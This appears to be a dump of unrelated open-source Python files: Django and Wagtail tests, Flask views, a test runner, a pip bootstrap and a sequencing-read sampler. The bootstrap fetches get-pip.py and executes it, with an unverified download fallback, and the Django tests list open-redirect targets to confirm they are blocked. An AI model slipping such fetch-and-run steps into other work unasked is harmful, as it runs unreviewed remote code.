self.unapplied = unapplied
self.hidden = hidden
def check_merged(self, patches):
"""Return a subset of patches already merged."""
out.start('Checking for patches merged upstream')
merged = []
if self.temp_index_tree != self.stack.head.data.tree:
self.temp_index.read_tree(self.stack.head.data.tree)
self.temp_index_tree = self.stack.head.data.tree
for pn in reversed(patches):
# check whether patch changes can be reversed in the current index
cd = self.patches[pn].data
if cd.is_nochange():
continue
try:
self.temp_index.apply_treediff(cd.tree, cd.parent.data.tree,
quiet = True)
merged.append(pn)
# The self.temp_index was modified by apply_treediff() so
# force read_tree() the next time merge() is used.
self.temp_index_tree = None
except git.MergeException:
pass
out.done('%d found' % len(merged))
return merged
|
miracle2k/stgit
|
stgit/lib/transaction.py
|
Python
|
gpl-2.0
| 17,358
|
from __future__ import with_statement
import os
import re
import urllib
from django.conf import settings
from django.contrib.auth import SESSION_KEY, REDIRECT_FIELD_NAME
from django.contrib.auth.forms import AuthenticationForm
from django.contrib.sites.models import Site, RequestSite
from django.contrib.auth.models import User
from django.test import TestCase
from django.core import mail
from django.core.urlresolvers import reverse
from django.http import QueryDict
class AuthViewsTestCase(TestCase):
"""
Helper base class for all the follow test cases.
"""
fixtures = ['authtestdata.json']
urls = 'django.contrib.auth.tests.urls'
def setUp(self):
self.old_LANGUAGES = settings.LANGUAGES
self.old_LANGUAGE_CODE = settings.LANGUAGE_CODE
settings.LANGUAGES = (('en', 'English'),)
settings.LANGUAGE_CODE = 'en'
self.old_TEMPLATE_DIRS = settings.TEMPLATE_DIRS
settings.TEMPLATE_DIRS = (
os.path.join(os.path.dirname(__file__), 'templates'),
)
def tearDown(self):
settings.LANGUAGES = self.old_LANGUAGES
settings.LANGUAGE_CODE = self.old_LANGUAGE_CODE
settings.TEMPLATE_DIRS = self.old_TEMPLATE_DIRS
def login(self, password='password'):
response = self.client.post('/login/', {
'username': 'testclient',
'password': password
}
)
self.assertEqual(response.status_code, 302)
self.assertTrue(response['Location'].endswith(settings.LOGIN_REDIRECT_URL))
self.assertTrue(SESSION_KEY in self.client.session)
class PasswordResetTest(AuthViewsTestCase):
def test_email_not_found(self):
"Error is raised if the provided email address isn't currently registered"
response = self.client.get('/password_reset/')
self.assertEqual(response.status_code, 200)
response = self.client.post('/password_reset/', {'email': 'not_a_real_email@email.com'})
self.assertContains(response, "That e-mail address doesn't have an associated user account")
self.assertEqual(len(mail.outbox), 0)
def test_email_found(self):
"Email is sent if a valid email address is provided for password reset"
response = self.client.post('/password_reset/', {'email': 'staffmember@example.com'})
self.assertEqual(response.status_code, 302)
self.assertEqual(len(mail.outbox), 1)
self.assertTrue("http://" in mail.outbox[0].body)
self.assertEqual(settings.DEFAULT_FROM_EMAIL, mail.outbox[0].from_email)
def test_email_found_custom_from(self):
"Email is sent if a valid email address is provided for password reset when a custom from_email is provided."
response = self.client.post('/password_reset_from_email/', {'email': 'staffmember@example.com'})
self.assertEqual(response.status_code, 302)
self.assertEqual(len(mail.outbox), 1)
self.assertEqual("staffmember@example.com", mail.outbox[0].from_email)
def _test_confirm_start(self):
# Start by creating the email
response = self.client.post('/password_reset/', {'email': 'staffmember@example.com'})
self.assertEqual(response.status_code, 302)
self.assertEqual(len(mail.outbox), 1)
return self._read_signup_email(mail.outbox[0])
def _read_signup_email(self, email):
urlmatch = re.search(r"https?://[^/]*(/.*reset/\S*)", email.body)
self.assertTrue(urlmatch is not None, "No URL found in sent email")
return urlmatch.group(), urlmatch.groups()[0]
def test_confirm_valid(self):
url, path = self._test_confirm_start()
response = self.client.get(path)
# redirect to a 'complete' page:
self.assertEqual(response.status_code, 200)
self.assertTrue("Please enter your new password" in response.content)
def test_confirm_invalid(self):
url, path = self._test_confirm_start()
# Let's munge the token in the path, but keep the same length,
# in case the URLconf will reject a different length.
path = path[:-5] + ("0"*4) + path[-1]
response = self.client.get(path)
self.assertEqual(response.status_code, 200)
self.assertTrue("The password reset link was invalid" in response.content)
def test_confirm_invalid_user(self):
# Ensure that we get a 200 response for a non-existant user, not a 404
response = self.client.get('/reset/123456-1-1/')
self.assertEqual(response.status_code, 200)
self.assertTrue("The password reset link was invalid" in response.content)
def test_confirm_overflow_user(self):
# Ensure that we get a 200 response for a base36 user id that overflows int
response = self.client.get('/reset/zzzzzzzzzzzzz-1-1/')
self.assertEqual(response.status_code, 200)
self.assertTrue("The password reset link was invalid" in response.content)
def test_confirm_invalid_post(self):
# Same as test_confirm_invalid, but trying
# to do a POST instead.
url, path = self._test_confirm_start()
path = path[:-5] + ("0"*4) + path[-1]
response = self.client.post(path, {'new_password1': 'anewpassword',
'new_password2':' anewpassword'})
# Check the password has not been changed
u = User.objects.get(email='staffmember@example.com')
self.assertTrue(not u.check_password("anewpassword"))
def test_confirm_complete(self):
url, path = self._test_confirm_start()
response = self.client.post(path, {'new_password1': 'anewpassword',
'new_password2': 'anewpassword'})
# It redirects us to a 'complete' page:
self.assertEqual(response.status_code, 302)
# Check the password has been changed
u = User.objects.get(email='staffmember@example.com')
self.assertTrue(u.check_password("anewpassword"))
# Check we can't use the link again
response = self.client.get(path)
self.assertEqual(response.status_code, 200)
self.assertTrue("The password reset link was invalid" in response.content)
def test_confirm_different_passwords(self):
url, path = self._test_confirm_start()
response = self.client.post(path, {'new_password1': 'anewpassword',
'new_password2':' x'})
self.assertEqual(response.status_code, 200)
self.assertTrue("The two password fields didn't match" in response.content)
class ChangePasswordTest(AuthViewsTestCase):
def fail_login(self, password='password'):
response = self.client.post('/login/', {
'username': 'testclient',
'password': password
}
)
self.assertEqual(response.status_code, 200)
self.assertTrue("Please enter a correct username and password. Note that both fields are case-sensitive." in response.content)
def logout(self):
response = self.client.get('/logout/')
def test_password_change_fails_with_invalid_old_password(self):
self.login()
response = self.client.post('/password_change/', {
'old_password': 'donuts',
'new_password1': 'password1',
'new_password2': 'password1',
}
)
self.assertEqual(response.status_code, 200)
self.assertTrue("Your old password was entered incorrectly. Please enter it again." in response.content)
def test_password_change_fails_with_mismatched_passwords(self):
self.login()
response = self.client.post('/password_change/', {
'old_password': 'password',
'new_password1': 'password1',
'new_password2': 'donuts',
}
)
self.assertEqual(response.status_code, 200)
self.assertTrue("The two password fields didn't match." in response.content)
def test_password_change_succeeds(self):
self.login()
response = self.client.post('/password_change/', {
'old_password': 'password',
'new_password1': 'password1',
'new_password2': 'password1',
}
)
self.assertEqual(response.status_code, 302)
self.assertTrue(response['Location'].endswith('/password_change/done/'))
self.fail_login()
self.login(password='password1')
def test_password_change_done_succeeds(self):
self.login()
response = self.client.post('/password_change/', {
'old_password': 'password',
'new_password1': 'password1',
'new_password2': 'password1',
}
)
self.assertEqual(response.status_code, 302)
self.assertTrue(response['Location'].endswith('/password_change/done/'))
def test_password_change_done_fails(self):
with self.settings(LOGIN_URL='/login/'):
response = self.client.get('/password_change/done/')
self.assertEqual(response.status_code, 302)
self.assertTrue(response['Location'].endswith('/login/?next=/password_change/done/'))
class LoginTest(AuthViewsTestCase):
def test_current_site_in_context_after_login(self):
response = self.client.get(reverse('django.contrib.auth.views.login'))
self.assertEqual(response.status_code, 200)
if Site._meta.installed:
site = Site.objects.get_current()
self.assertEqual(response.context['site'], site)
self.assertEqual(response.context['site_name'], site.name)
else:
self.assertIsInstance(response.context['site'], RequestSite)
self.assertTrue(isinstance(response.context['form'], AuthenticationForm),
'Login form is not an AuthenticationForm')
def test_security_check(self, password='password'):
login_url = reverse('django.contrib.auth.views.login')
# Those URLs should not pass the security check
for bad_url in ('http://example.com',
'https://example.com',
'ftp://exampel.com',
'//example.com'):
nasty_url = '%(url)s?%(next)s=%(bad_url)s' % {
'url': login_url,
'next': REDIRECT_FIELD_NAME,
'bad_url': urllib.quote(bad_url)
}
response = self.client.post(nasty_url, {
'username': 'testclient',
'password': password,
}
)
self.assertEqual(response.status_code, 302)
self.assertFalse(bad_url in response['Location'],
"%s should be blocked" % bad_url)
# These URLs *should* still pass the security check
for good_url in ('/view/?param=http://example.com',
'/view/?param=https://example.com',
'/view?param=ftp://exampel.com',
'view/?param=//example.com',
'https:///',
'//testserver/',
'/url%20with%20spaces/', # see ticket #12534
):
safe_url = '%(url)s?%(next)s=%(good_url)s' % {
'url': login_url,
'next': REDIRECT_FIELD_NAME,
'good_url': urllib.quote(good_url)
}
response = self.client.post(safe_url, {
'username': 'testclient',
'password': password,
}
)
self.assertEqual(response.status_code, 302)
self.assertTrue(good_url in response['Location'],
"%s should be allowed" % good_url)
class LoginURLSettings(AuthViewsTestCase):
urls = 'django.contrib.auth.tests.urls'
def setUp(self):
super(LoginURLSettings, self).setUp()
self.old_LOGIN_URL = settings.LOGIN_URL
def tearDown(self):
super(LoginURLSettings, self).tearDown()
settings.LOGIN_URL = self.old_LOGIN_URL
def get_login_required_url(self, login_url):
settings.LOGIN_URL = login_url
response = self.client.get('/login_required/')
self.assertEqual(response.status_code, 302)
return response['Location']
def test_standard_login_url(self):
login_url = '/login/'
login_required_url = self.get_login_required_url(login_url)
querystring = QueryDict('', mutable=True)
querystring['next'] = '/login_required/'
self.assertEqual(login_required_url,
'http://testserver%s?%s' % (login_url, querystring.urlencode('/')))
def test_remote_login_url(self):
login_url = 'http://remote.example.com/login'
login_required_url = self.get_login_required_url(login_url)
querystring = QueryDict('', mutable=True)
querystring['next'] = 'http://testserver/login_required/'
self.assertEqual(login_required_url,
'%s?%s' % (login_url, querystring.urlencode('/')))
def test_https_login_url(self):
login_url = 'https:///login/'
login_required_url = self.get_login_required_url(login_url)
querystring = QueryDict('', mutable=True)
querystring['next'] = 'http://testserver/login_required/'
self.assertEqual(login_required_url,
'%s?%s' % (login_url, querystring.urlencode('/')))
def test_login_url_with_querystring(self):
login_url = '/login/?pretty=1'
login_required_url = self.get_login_required_url(login_url)
querystring = QueryDict('pretty=1', mutable=True)
querystring['next'] = '/login_required/'
self.assertEqual(login_required_url, 'http://testserver/login/?%s' %
querystring.urlencode('/'))
def test_remote_login_url_with_next_querystring(self):
login_url = 'http://remote.example.com/login/'
login_required_url = self.get_login_required_url('%s?next=/default/' %
login_url)
querystring = QueryDict('', mutable=True)
querystring['next'] = 'http://testserver/login_required/'
self.assertEqual(login_required_url, '%s?%s' % (login_url,
querystring.urlencode('/')))
class LogoutTest(AuthViewsTestCase):
urls = 'django.contrib.auth.tests.urls'
def confirm_logged_out(self):
self.assertTrue(SESSION_KEY not in self.client.session)
def test_logout_default(self):
"Logout without next_page option renders the default template"
self.login()
response = self.client.get('/logout/')
self.assertEqual(200, response.status_code)
self.assertTrue('Logged out' in response.content)
self.confirm_logged_out()
def test_14377(self):
# Bug 14377
self.login()
response = self.client.get('/logout/')
self.assertTrue('site' in response.context)
def test_logout_with_overridden_redirect_url(self):
# Bug 11223
self.login()
response = self.client.get('/logout/next_page/')
self.assertEqual(response.status_code, 302)
self.assertTrue(response['Location'].endswith('/somewhere/'))
response = self.client.get('/logout/next_page/?next=/login/')
self.assertEqual(response.status_code, 302)
self.assertTrue(response['Location'].endswith('/login/'))
self.confirm_logged_out()
def test_logout_with_next_page_specified(self):
"Logout with next_page option given redirects to specified resource"
self.login()
response = self.client.get('/logout/next_page/')
self.assertEqual(response.status_code, 302)
self.assertTrue(response['Location'].endswith('/somewhere/'))
self.confirm_logged_out()
def test_logout_with_redirect_argument(self):
"Logout with query string redirects to specified resource"
self.login()
response = self.client.get('/logout/?next=/login/')
self.assertEqual(response.status_code, 302)
self.assertTrue(response['Location'].endswith('/login/'))
self.confirm_logged_out()
def test_logout_with_custom_redirect_argument(self):
"Logout with custom query string redirects to specified resource"
self.login()
response = self.client.get('/logout/custom_query/?follow=/somewhere/')
self.assertEqual(response.status_code, 302)
self.assertTrue(response['Location'].endswith('/somewhere/'))
self.confirm_logged_out()
def test_security_check(self, password='password'):
logout_url = reverse('django.contrib.auth.views.logout')
# Those URLs should not pass the security check
for bad_url in ('http://example.com',
'https://example.com',
'ftp://exampel.com',
'//example.com'
):
nasty_url = '%(url)s?%(next)s=%(bad_url)s' % {
'url': logout_url,
'next': REDIRECT_FIELD_NAME,
'bad_url': urllib.quote(bad_url)
}
self.login()
response = self.client.get(nasty_url)
self.assertEqual(response.status_code, 302)
self.assertFalse(bad_url in response['Location'],
"%s should be blocked" % bad_url)
self.confirm_logged_out()
# These URLs *should* still pass the security check
for good_url in ('/view/?param=http://example.com',
'/view/?param=https://example.com',
'/view?param=ftp://exampel.com',
'view/?param=//example.com',
'https:///',
'//testserver/',
'/url%20with%20spaces/', # see ticket #12534
):
safe_url = '%(url)s?%(next)s=%(good_url)s' % {
'url': logout_url,
'next': REDIRECT_FIELD_NAME,
'good_url': urllib.quote(good_url)
}
self.login()
response = self.client.get(safe_url)
self.assertEqual(response.status_code, 302)
self.assertTrue(good_url in response['Location'],
"%s should be allowed" % good_url)
self.confirm_logged_out()
|
disqus/django-old
|
django/contrib/auth/tests/views.py
|
Python
|
bsd-3-clause
| 18,537
|
# -*- coding: utf-8 -*-
"""
Defines views.
"""
import calendar
from flask import redirect, abort
from flask.ext.mako import render_template
from mako.exceptions import TopLevelLookupException
from presence_analyzer.main import app
from presence_analyzer.utils import (
jsonify,
get_data,
mean,
group_by_weekday,
group_start_end_by_weekday,
get_xml_data
)
import logging
log = logging.getLogger(__name__) # pylint: disable=C0103
@app.route('/')
def mainpage():
"""
Redirects to front page.
"""
return redirect("presence_weekday.html")
@app.route('/<site>')
def presence_page(site=None):
"""
Returns rendered site.
"""
try:
return render_template(site)
except TopLevelLookupException:
abort(404)
@app.route('/api/v1/users', methods=['GET'])
@jsonify
def users_view():
"""
Users listing for dropdown.
"""
data = get_data()
return [{'user_id': i, 'name': 'User {0}'.format(str(i))}
for i in data.keys()]
@app.route('/api/v2/users')
@jsonify
def users_xml_view():
"""
Users with name, avatar listing.
"""
return get_xml_data()
@app.route('/api/v1/mean_time_weekday/<int:user_id>', methods=['GET'])
@jsonify
def mean_time_weekday_view(user_id):
"""
Returns mean presence time of given user grouped by weekday.
"""
data = get_data()
if user_id not in data:
log.debug('User %s not found!', user_id)
return []
weekdays = group_by_weekday(data[user_id])
result = [(calendar.day_abbr[weekday], mean(intervals))
for weekday, intervals in weekdays.items()]
return result
@app.route('/api/v1/presence_weekday/<int:user_id>', methods=['GET'])
@jsonify
def presence_weekday_view(user_id):
"""
Returns total presence time of given user grouped by weekday.
"""
data = get_data()
if user_id not in data:
log.debug('User %s not found!', user_id)
return []
weekdays = group_by_weekday(data[user_id])
result = [(calendar.day_abbr[weekday], sum(intervals))
for weekday, intervals in weekdays.items()]
result.insert(0, ('Weekday', 'Presence (s)'))
return result
@app.route('/api/v1/presence_start_end/<int:user_id>', methods=['GET'])
@jsonify
def presence_start_end_view(user_id):
"""
Returns start, end time when user is most often present grouped by weekday.
"""
data = get_data()
if user_id not in data:
log.debug('User %s not found!', user_id)
return []
weekdays = group_start_end_by_weekday(data[user_id])
result = [
(calendar.day_abbr[weekday],
mean(start_end_dict['start']),
mean(start_end_dict['end']))
for weekday, start_end_dict in weekdays.items()
]
return result
|
stxnext-kindergarten/presence-analyzer-mjelonek
|
src/presence_analyzer/views.py
|
Python
|
mit
| 2,812
|
#! /usr/bin/env python
import os
import sys
import subprocess
def runTests():
commands = ['./analyticTest.pl CosineHillRotateBC.xml -optionsFile np-1.dat', \
'./analyticTest.pl CosineHillRotateBC.xml -optionsFile np-2.dat', \
'./analyticTest.pl CosineHillRotateBC.xml -optionsFile np-4.dat', \
'./analyticTest.pl CosineHillRotateBC-DualMesh.xml -optionsFile np-1.dat', \
'./analyticTest.pl CosineHillRotateBC-DualMesh.xml -optionsFile np-2.dat', \
'./analyticTest.pl CosineHillRotateBC-DualMesh.xml -optionsFile np-4.dat', \
'./analyticTest.pl HomogeneousNaturalBCs.xml -optionsFile np-1.dat', \
'./analyticTest.pl HomogeneousNaturalBCs.xml -optionsFile np-2.dat', \
'./analyticTest.pl HomogeneousNaturalBCs.xml -optionsFile np-4.dat', \
'./analyticTest.pl HomogeneousNaturalBCs-DualMesh.xml -optionsFile np-1.dat', \
'./analyticTest.pl HomogeneousNaturalBCs-DualMesh.xml -optionsFile np-2.dat', \
'./analyticTest.pl HomogeneousNaturalBCs-DualMesh.xml -optionsFile np-4.dat', \
'./analyticTest.pl SteadyState1D-x.xml -optionsFile ss-0.5-np-1.dat', \
'./analyticTest.pl SteadyState1D-x.xml -optionsFile ss-0.5-np-2.dat', \
'./analyticTest.pl SteadyState1D-x.xml -optionsFile ss-0.5-np-4.dat', \
'./analyticTest.pl SteadyState1D-x.xml -optionsFile np-1.dat', \
'./analyticTest.pl SteadyState1D-x.xml -optionsFile np-2.dat', \
'./analyticTest.pl SteadyState1D-x.xml -optionsFile np-4.dat', \
'./analyticTest.pl SteadyState1D-y.xml -optionsFile np-1.dat', \
'./analyticTest.pl SteadyState1D-y.xml -optionsFile np-2.dat', \
'./analyticTest.pl SteadyState1D-y.xml -optionsFile np-4.dat', \
'./analyticTest.pl AnalyticSimpleShear.xml -optionsFile np-1.dat', \
'./analyticTest.pl AnalyticSimpleShear.xml -optionsFile np-2.dat', \
'./analyticTest.pl AnalyticSimpleShear.xml -optionsFile np-4.dat', \
'./analyticTest.pl AnalyticSinusoid.xml -optionsFile as-np-1.dat', \
'./analyticTest.pl AnalyticSinusoid.xml -optionsFile as-np-2.dat', \
'./analyticTest.pl AnalyticSinusoid.xml -optionsFile as-np-4.dat', \
'./analyticTest.pl TempDiffusion.xml -optionsFile np-1.dat', \
'./analyticTest.pl TempDiffusion.xml -optionsFile np-2.dat', \
'./analyticTest.pl TempDiffusion.xml -optionsFile np-4.dat', \
'./analyticTest.pl TempDiffusion.xml -optionsFile np-8.dat', \
'./checkpointTest.pl Multigrid.xml']
failed_commands = []
passed = 0
failed = 0
for command in commands:
try:
retcode = subprocess.call( command, shell=True )
if retcode == 0:
passed += 1
else:
failed += 1
failed_commands.append( command )
except OSError, e:
print >>sys.stderr, "Execution Failed:", e
filename = "../../../summary.dat"
if os.path.exists( filename ):
FILE = open( filename, "a" )
else:
FILE = open( filename, "w" )
message = ''
message += "--------------------------------------------------------\n" + \
"[SYS] StgFEM Normal-Res Integration Tests:\n" + \
"[SYS] Total Passes: (" + str(passed) + "/" + str(len( commands )) + ")\n"
if( len(failed_commands) > 0 ):
message += "[SYS] Failed Commands:\n"
for command in failed_commands:
message += "[SYS] " + command + "\n"
message += "--------------------------------------------------------\n"
FILE.write( message )
print message
FILE.close()
if failed > 0:
sys.exit(1)
else:
sys.exit(0)
runTests()
|
geodynamics/gale
|
StgFEM/SysTest/RegressionTests/testAll.py
|
Python
|
gpl-2.0
| 4,003
|
from unittest import mock
from django.contrib.auth.models import Permission
from django.test import TestCase
from django.urls import reverse
from wagtail.core.models import Page
from wagtail.core.signals import page_unpublished
from wagtail.tests.testapp.models import SimplePage
from wagtail.tests.utils import WagtailTestUtils
class TestPageUnpublish(TestCase, WagtailTestUtils):
def setUp(self):
self.user = self.login()
# Create a page to unpublish
self.root_page = Page.objects.get(id=2)
self.page = SimplePage(
title="Hello world!",
slug='hello-world',
content="hello",
live=True,
)
self.root_page.add_child(instance=self.page)
def test_unpublish_view(self):
"""
This tests that the unpublish view responds with an unpublish confirm page
"""
# Get unpublish page
response = self.client.get(reverse('wagtailadmin_pages:unpublish', args=(self.page.id, )))
# Check that the user received an unpublish confirm page
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'wagtailadmin/pages/confirm_unpublish.html')
def test_unpublish_view_invalid_page_id(self):
"""
This tests that the unpublish view returns an error if the page id is invalid
"""
# Get unpublish page
response = self.client.get(reverse('wagtailadmin_pages:unpublish', args=(12345, )))
# Check that the user received a 404 response
self.assertEqual(response.status_code, 404)
def test_unpublish_view_bad_permissions(self):
"""
This tests that the unpublish view doesn't allow users without unpublish permissions
"""
# Remove privileges from user
self.user.is_superuser = False
self.user.user_permissions.add(
Permission.objects.get(content_type__app_label='wagtailadmin', codename='access_admin')
)
self.user.save()
# Get unpublish page
response = self.client.get(reverse('wagtailadmin_pages:unpublish', args=(self.page.id, )))
# Check that the user received a 403 response
self.assertEqual(response.status_code, 403)
def test_unpublish_view_post(self):
"""
This posts to the unpublish view and checks that the page was unpublished
"""
# Connect a mock signal handler to page_unpublished signal
mock_handler = mock.MagicMock()
page_unpublished.connect(mock_handler)
# Post to the unpublish page
response = self.client.post(reverse('wagtailadmin_pages:unpublish', args=(self.page.id, )))
# Should be redirected to explorer page
self.assertRedirects(response, reverse('wagtailadmin_explore', args=(self.root_page.id, )))
# Check that the page was unpublished
self.assertFalse(SimplePage.objects.get(id=self.page.id).live)
# Check that the page_unpublished signal was fired
self.assertEqual(mock_handler.call_count, 1)
mock_call = mock_handler.mock_calls[0][2]
self.assertEqual(mock_call['sender'], self.page.specific_class)
self.assertEqual(mock_call['instance'], self.page)
self.assertIsInstance(mock_call['instance'], self.page.specific_class)
def test_unpublish_descendants_view(self):
"""
This tests that the unpublish view responds with an unpublish confirm page that does not contain the form field 'include_descendants'
"""
# Get unpublish page
response = self.client.get(reverse('wagtailadmin_pages:unpublish', args=(self.page.id, )))
# Check that the user received an unpublish confirm page
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'wagtailadmin/pages/confirm_unpublish.html')
# Check the form does not contain the checkbox field include_descendants
self.assertNotContains(response, '<input id="id_include_descendants" name="include_descendants" type="checkbox">')
class TestPageUnpublishIncludingDescendants(TestCase, WagtailTestUtils):
def setUp(self):
self.user = self.login()
# Find root page
self.root_page = Page.objects.get(id=2)
# Create a page to unpublish
self.test_page = self.root_page.add_child(instance=SimplePage(
title="Hello world!",
slug='hello-world',
content="hello",
live=True,
has_unpublished_changes=False,
))
# Create a couple of child pages
self.test_child_page = self.test_page.add_child(instance=SimplePage(
title="Child page",
slug='child-page',
content="hello",
live=True,
has_unpublished_changes=True,
))
self.test_another_child_page = self.test_page.add_child(instance=SimplePage(
title="Another Child page",
slug='another-child-page',
content="hello",
live=True,
has_unpublished_changes=True,
))
def test_unpublish_descendants_view(self):
"""
This tests that the unpublish view responds with an unpublish confirm page that contains the form field 'include_descendants'
"""
# Get unpublish page
response = self.client.get(reverse('wagtailadmin_pages:unpublish', args=(self.test_page.id, )))
# Check that the user received an unpublish confirm page
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'wagtailadmin/pages/confirm_unpublish.html')
# Check the form contains the checkbox field include_descendants
self.assertContains(response, '<input id="id_include_descendants" name="include_descendants" type="checkbox">')
def test_unpublish_include_children_view_post(self):
"""
This posts to the unpublish view and checks that the page and its descendants were unpublished
"""
# Post to the unpublish page
response = self.client.post(reverse('wagtailadmin_pages:unpublish', args=(self.test_page.id, )), {'include_descendants': 'on'})
# Should be redirected to explorer page
self.assertRedirects(response, reverse('wagtailadmin_explore', args=(self.root_page.id, )))
# Check that the page was unpublished
self.assertFalse(SimplePage.objects.get(id=self.test_page.id).live)
# Check that the descendant pages were unpublished as well
self.assertFalse(SimplePage.objects.get(id=self.test_child_page.id).live)
self.assertFalse(SimplePage.objects.get(id=self.test_another_child_page.id).live)
def test_unpublish_not_include_children_view_post(self):
"""
This posts to the unpublish view and checks that the page was unpublished but its descendants were not
"""
# Post to the unpublish page
response = self.client.post(reverse('wagtailadmin_pages:unpublish', args=(self.test_page.id, )), {})
# Should be redirected to explorer page
self.assertRedirects(response, reverse('wagtailadmin_explore', args=(self.root_page.id, )))
# Check that the page was unpublished
self.assertFalse(SimplePage.objects.get(id=self.test_page.id).live)
# Check that the descendant pages were not unpublished
self.assertTrue(SimplePage.objects.get(id=self.test_child_page.id).live)
self.assertTrue(SimplePage.objects.get(id=self.test_another_child_page.id).live)
|
timorieber/wagtail
|
wagtail/admin/tests/pages/test_unpublish_page.py
|
Python
|
bsd-3-clause
| 7,589
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from .base import BaseElasticsearchQuery
class AllElasticsearchQuery(BaseElasticsearchQuery):
"""
This is an Elasticsearch query class that is meant to query all of the document types in
a given index.
"""
# Class Members
# Instantiation
# Static Methods
# Class Methods
@classmethod
def get_queried_class(cls):
return None
# Public Methods
# Protected Methods
def _validate_queryable_field(self, field):
pass
# Private Methods
# Properties
@property
def doc_type(self):
return None
@property
def queryable_fields(self):
return []
# Representation and Comparison
|
lavalamp-/ws-backend-community
|
wselasticsearch/query/all.py
|
Python
|
gpl-3.0
| 754
|
'''
The MIT License (MIT)
Copyright (c) 2016-2018, Hong-She Liang <starofrainnight@gmail.com>.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
'''
'''
Bootstrap pydgutils setup environment
@author Hong-She Liang <starofrainnight@gmail.com>
'''
import os
import os.path
import platform
import subprocess
import sys
def _clean_check(cmd, target):
"""
Run the command to download target. If the command fails, clean up before
re-raising the error.
"""
try:
subprocess.check_call(cmd)
except subprocess.CalledProcessError:
if os.access(target, os.F_OK):
os.unlink(target)
raise
def download_file_powershell(url, target):
"""
Download the file at url to target using Powershell (which will validate
trust). Raise an exception if the command cannot complete.
"""
target = os.path.abspath(target)
cmd = [
'powershell',
'-Command',
"(new-object System.Net.WebClient).DownloadFile(%(url)r, %(target)r)" %
vars(),
]
_clean_check(cmd, target)
def has_powershell():
if platform.system() != 'Windows':
return False
cmd = ['powershell', '-Command', 'echo test']
devnull = open(os.path.devnull, 'wb')
try:
try:
subprocess.check_call(cmd, stdout=devnull, stderr=devnull)
except:
return False
finally:
devnull.close()
return True
download_file_powershell.viable = has_powershell
def download_file_curl(url, target):
cmd = ['curl', url, '--silent', '--output', target]
_clean_check(cmd, target)
def has_curl():
cmd = ['curl', '--version']
devnull = open(os.path.devnull, 'wb')
try:
try:
subprocess.check_call(cmd, stdout=devnull, stderr=devnull)
except:
return False
finally:
devnull.close()
return True
download_file_curl.viable = has_curl
def download_file_wget(url, target):
cmd = ['wget', url, '--quiet', '--output-document', target]
_clean_check(cmd, target)
def has_wget():
cmd = ['wget', '--version']
devnull = open(os.path.devnull, 'wb')
try:
try:
subprocess.check_call(cmd, stdout=devnull, stderr=devnull)
except:
return False
finally:
devnull.close()
return True
download_file_wget.viable = has_wget
def download_file_insecure(url, target):
"""
Use Python to download the file, even though it cannot authenticate the
connection.
"""
try:
from urllib.request import urlopen
except ImportError:
from urllib2 import urlopen
src = dst = None
try:
src = urlopen(url)
# Read/write all in one block, so we don't create a corrupt file
# if the download is interrupted.
data = src.read()
dst = open(target, "wb")
dst.write(data)
finally:
if src:
src.close()
if dst:
dst.close()
download_file_insecure.viable = lambda: True
def get_best_downloader():
downloaders = [
download_file_powershell,
download_file_curl,
download_file_wget,
download_file_insecure,
]
for dl in downloaders:
if dl.viable():
return dl
def download(url):
downloader = get_best_downloader()
downloader(url, os.path.basename(url))
def use_pip():
try:
import pip
except:
import os
import sys
# If we do not have pip, we fetch and install one. It will also install
# setuptools and wheel.
url = "https://bootstrap.pypa.io/get-pip.py"
filename = os.path.basename(url)
download(url)
os.system("%s %s" % (sys.executable, filename))
def use_pydgutils():
try:
import pydgutils
except:
use_pip()
try:
from pip import main as pipmain
except:
from pip._internal import main as pipmain
pipmain(["install", "pydgutils"])
|
starofrainnight/rabird.auto
|
pydgutils_bootstrap.py
|
Python
|
mit
| 4,995
|
import numpy as np
import os
import commands
import itertools
import multiprocessing as mp
import scipy.sparse
import math
import sys
import getopt
try:
opts, args = getopt.getopt(sys.argv[1:],"i:o:r:k:n:",["idir=","odir=","sampling-rate=","sampling-key=","njobs="])
except getopt.GetoptError:
print ("getopterrror")
print ('usage is : \n python sample_reads.py -i input_read_dir -o output-read-dir -r sampling-rate -k sampling-key [-n number-of-processes]')
sys.exit(1)
key=0
read_dir=''
out_dir=''
sampling_rate=0
num_proc=1
print opts
for opt,arg in opts:
if opt in ("-i", "--idir"):
read_dir=arg
elif opt in ("-o", "--odir"):
out_dir=arg
elif opt in ("-n","--njobs"):
num_proc=int(arg)
elif opt in ("-r","--sampling-rate"):
sampling_rate=float(arg)
elif opt in ("-k","--sampling-key"):
key=int(arg)
if (not read_dir) or (not out_dir) or (not sampling_rate) or (not key):
print ('usage is : \n python sample_reads.py -i input_read_dir -o output-read-dir -r sampling-rate -k sampling-key [-n number-of-processes]')
sys.exit(1)
def subsample_reads(fltuple):
flname=fltuple[0]
subsampling_rate=fltuple[1]
read_dir=fltuple[2]
out_dir=fltuple[3]
key=fltuple[4]
cmd='zcat '+read_dir+flname+' | wc -l'
out=commands.getstatusoutput(cmd)
num_reads=int(out[1])/4
num_reads_to_sample=int(math.ceil(num_reads*subsampling_rate))
print num_reads_to_sample
cmd2='seqtk sample -s'+str(key)+' '+read_dir+flname+' '+ str(num_reads_to_sample) + ' | gzip > '+out_dir+flname
print cmd2
os.system(cmd2)
# In[14]:
#print repr(sys.argv[1])
os.system('mkdir -p '+out_dir)
flnames=sorted([x for x in os.listdir(read_dir) if x.endswith('.fastq.gz')])
